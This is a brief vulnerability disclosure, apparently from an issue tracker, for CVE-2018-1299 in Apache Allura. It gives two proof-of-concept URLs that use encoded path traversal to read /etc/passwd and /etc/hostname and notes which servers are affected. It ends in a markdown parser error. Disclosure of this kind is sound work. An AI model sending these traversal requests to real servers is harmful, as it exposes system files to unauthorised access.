From reporter:
The vulnerability allows unauthenticated attackers to retrieve
arbitrary files from the Allura web server.PoC URsL:
http://<allura-web-server>/nf/1276635823/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
http://<allura-web-server>/nf/1276635823/static/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fhostname</allura-web-server></allura-web-server>
The %2F does't seem necessary in my testing. The paster, nginx and apache/mod_wsgi servers seem to protect against this, but gunicorn (which we recommend for production) permits the vulnerability.
This has been assigned CVE-2018-1299
ERROR! The markdown supplied could not be parsed correctly. Did you forget to surround a code snippet with "~~~~"?